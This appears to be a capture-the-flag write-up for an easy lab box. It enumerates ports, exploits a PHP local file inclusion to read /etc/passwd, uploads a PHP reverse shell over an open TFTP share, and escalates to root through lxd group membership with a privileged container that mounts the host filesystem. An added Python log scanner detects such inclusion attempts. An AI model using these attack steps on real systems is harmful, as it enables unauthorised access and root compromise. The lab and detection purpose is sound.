Included

Personal Rating: Easy

Enumeration

Running an initial nmap scan:

sudo nmap <IP>

80/tcp open  http 
68/udp open|filtered dhcpc 
69/udp open|filtered tftp

PHP Path Traversal

I quickly found an LFI approach:

/script.php?page=../../../../../../etc/passwd

root:x:0:0:root:/root:/bin/bash
<SNIP>
mike:x:1000:1000:mike:/home/mike:/bin/bash
tftp:x:110:113:

So the first user seems to be 'mike'.

Since we have the tftp user and the port 69 open, I searched for the tftp default folder, which is /var/lib/tftpboot.

I tried some command executions using php wrappers with the LFI, but that didn't work.
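To spot requests like the one above from the defender's side, the following is an added example (not part of the original write-up) that scans web access-log lines for suspicious values of the page parameter: directory traversal, stream wrappers, and includes that resolve into the TFTP folder. The web root /var/www/html, the log format and the sample log lines are assumptions constructed for illustration.

```python
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

INCLUDE_PARAM = "page"            # parameter used in the request shown above
WEB_ROOT = "/var/www/html"        # assumption: directory script.php is served from
TFTP_ROOT = "/var/lib/tftpboot"   # TFTP default folder named in the write-up
WRAPPER = re.compile(r"^[a-z][a-z0-9+.\-]*://", re.I)   # php://, data://, ...
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

SAMPLE_LOG = [  # constructed access-log lines, not captured from a real host
    '10.10.14.7 - - [01/Jan/2024:10:00:00 +0000] "GET /script.php?page=home.php HTTP/1.1" 200 512',
    '10.10.14.7 - - [01/Jan/2024:10:00:05 +0000] "GET /script.php?page=../../../../../../etc/passwd HTTP/1.1" 200 1575',
    '10.10.14.7 - - [01/Jan/2024:10:00:09 +0000] "GET /script.php?page=%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd HTTP/1.1" 200 0',
    '10.10.14.7 - - [01/Jan/2024:10:00:12 +0000] "GET /script.php?page=php://input HTTP/1.1" 200 0',
    '10.10.14.7 - - [01/Jan/2024:10:00:20 +0000] "GET /script.php?page=/var/lib/tftpboot/upload.php HTTP/1.1" 200 0',
]

def fully_decode(value, rounds=5):
    """Undo nested percent-encoding so the checks see the final path."""
    for _ in range(rounds):
        value, previous = unquote(value), value
        if value == previous:
            break
    return value

def classify(value):
    """Return the reasons an include parameter value is suspicious."""
    value = fully_decode(value).replace("\\", "/")
    if WRAPPER.match(value):
        return ["stream-wrapper"]
    reasons = []
    if ".." in value.split("/"):
        reasons.append("traversal")
    resolved = posixpath.normpath(posixpath.join(WEB_ROOT, value))
    if not (resolved + "/").startswith(WEB_ROOT + "/"):
        reasons.append("outside-webroot")
    if (resolved + "/").startswith(TFTP_ROOT + "/"):
        reasons.append("tftp-upload-dir")
    return reasons

def scan(log_lines):
    """Yield (client, value, reasons) for each suspicious request line."""
    for line in log_lines:
        m = REQUEST.search(line)
        query = urlsplit(m.group(1)).query if m else ""
        for value in parse_qs(query).get(INCLUDE_PARAM, []):
            reasons = classify(value)
            if reasons:
                yield line.split()[0], value, reasons
```

A hit tagged tftp-upload-dir is the one to prioritise, since it means the web application was asked to include a file from a directory that unauthenticated TFTP clients can write to.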

Initial Access

I found mike's credentials in the file '.htaccess'.

Through the LFI I also found out that the user is a member of the lxd group, which opens up this privilege escalation path:

But first I have to get a shell. I uploaded a webshell using the tftp share:

tftp 10.129.95.185
> put php-reverse-shell.php

I fetched the shell and upgraded it to a fully interactive one:

python3 -c 'import pty; pty.spawn("/bin/bash")'

LXD Group Abuse to root

I then used the tftp port to transfer an Alpine Linux container onto the host to exploit the lxd group.

lxd init
lxc image import container --alias privesc
lxc image list
# By default lxc spawns unprivileged containers and does UID mapping. With this option, UID 0 in the container is mapped to UID 0 on the host (root).
lxc init privesc privesc-container -c security.privileged=true
lxc config device add privesc-container mydevice disk source=/ path=/mnt/root recursive=true
lxc start privesc-container && lxc list
lxc exec privesc-container /bin/sh

# cat /mnt/root/root/root.txt
